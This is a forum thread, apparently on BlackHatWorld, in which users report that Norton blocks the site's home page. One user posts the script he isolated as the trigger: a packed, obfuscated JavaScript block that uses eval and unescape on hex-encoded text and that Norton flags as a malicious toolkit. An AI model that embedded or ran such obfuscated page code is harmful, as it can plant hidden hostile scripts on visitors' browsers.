Security Warnings From Norton Finally Stopped

R

ronnymundster

Newbie
Joined
May 4, 2009
Messages
22
Reaction score
7
This is my first visit to Blackhatworld in a while that wasn't blocked by Norton Internet Security 2010 in some way. Every visit to the home page for the past couple of weeks warned about an HTTP toolkit variant of some kind. Anyway, I am glad whatever was causing the warning has finally stopped.
 
Advertise on BHW
Sorry to resurrect this thread. I am still having this issue and for the last 6 months I have been unable to access the main page of BHW because of the security warnings from Norton Internet Security.

I know Norton is not regarded as the best antivirus around here but it is all I got and even when I plan to buy Kaspersky, I got quite a few months left in my Norton subscription. Also, whatever crap Norton is, it is used by quite a lot of people and having a red warning triggering the first time they visit BHW is surely going to scare them away.

I have visited other vBulletin forums with a CMS portal and this is the only one which triggers that warning.

Anyway, I went through the trouble of saving the main page of BHW on another computer and then removing pieces of the HTML until Norton stopped giving the warning. At the end it came down to this:

Code: 
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\b\'+e(c)+\'\\b\',\'g\'),k[c])}}return p}(\'n(m("%b%l%e%1%j%7%k%i%o%u%p%s%i%7%r%h%2%1%0%0%6%e%2%1%0%0%3%a%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%d%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%5%2%1%0%0%3%6%2%1%0%0%6%b%2%1%0%0%3%f%2%1%0%0%4%c%2%1%0%0%4%c%2%1%0%0%4%0%2%1%0%0%6%g%2%1%0%0%5%8%2%1%0%0%5%8%2%1%0%0%3%4%2%1%0%0%3%8%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0%0%3%e%2%1%0%0%3%9%2%1%0%0%5%b%2%1%0%0%3%d%2%1%0%0%3%7%2%1%0%0%3%d%2%1%0%0%3%e%2%1%0%0%4%a%2%1%0%0%4%g%2%1%0%0%3%9%2%1%0%0%5%7%2%1%0%0%3%6%2%1%0%0%3%8%2%1%0%0%3%b%2%1%0%0%5%8%2%1%0%0%3%6%2%1%0%0%3%8%2%1%0%0%4%9%2%1%0%0%3%7%2%1%0%0%4%c%2%1%0%0%3%9%2%1%0%0%4%5%2%1%0%0%5%8%2%1%0%0%3%a%2%1%0%0%3%7%2%1%0%0%3%c%2%1%0%0%3%9%2%1%0%0%4%f%2%1%0%0%5%7%2%1%0%0%4%0%2%1%0%0%3%f%2%1%0%0%4%0%2%1%0%0%5%0%2%1%0%0%4%4%2%1%0%0%3%a%2%1%0%0%3%c%2%1%0%0%4%c%2%1%0%0%3%f%2%1%0%0%6%b%2%1%0%0%6%d%2%1%0%0%5%0%2%1%0%0%3%f%2%1%0%0%3%9%2%1%0%0%3%a%2%1%0%0%3%4%2%1%0%0%3%f%2%1%0%0%4%c%2%1%0%0%6%b%2%1%0%0%6%d%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%c%2%1%0%0%4%a%2%1%0%0%3%e%2%1%0%0%3%9%2%1%0%0%6%b%2%1%0%0%5%5%2%1%0%0%3%c%2%1%0%0%3%a%2%1%0%0%4%6%2%1%0%0%4%0%2%1%0%0%3%e%2%1%0%0%3%d%2%1%0%0%4%a%2%1%0%0%6%g%2%1%0%0%3%7%2%1%0%0%3%8%2%1%0%0%3%7%2%1%0%0%3%9%2%1%0%0%5%5%2%1%0%0%6%7%2%1%0%0%6%e%2%1%0%0%5%8%2%1%0%0%3%a%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%d%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%6%7%h%q%t"));\',31,31,\'30|75|5C|36|37|32|33|65|66|35|39|64|34|31|63|38|61|27|74|6D|6E|6F|unescape|eval|2E|72|29|28|69|3B|77\'.split(\'|\'),0,{}));
</script>

I have no idea what the above code does but it is present two times: around line 716 and line 894.

I hope the admins see this post and perhaps decide to change the code around to avoid the false positives.
 
Thank you Admins and Mods!! It seems the code was removed and I can once again browse the main page of BHW and stay on top of the latest posts and news!

/cheers

Edit: crap. I spoke too soon. The code is back and once again I can't open the main page :(
 
Last edited:
Advertise on BHW
You must log in or register to reply here.
Sign up now!

Main Menu

Home Main Forum List Black Hat SEO White Hat SEO BHW Newbie Guide Blogging Black Hat Tools Social Networking Downloads

Marketplace

Account Selling Content / Copywriting Hosting Images, Logos & Videos Proxies For Sale SEO - Link building SEO - Packages Social Media Social Media - Panels Misc

Making Money

Affiliate Programs Hire a Freelancer Making Money Pay Per Click Site Flipping

BlackHatWorld

BHW Merch Forum Suggestions & Feedback Introductions Lounge Dispute Resolution

Other

Domain Name Forum IM Journeys Web Hosting Newsletter
Back
Top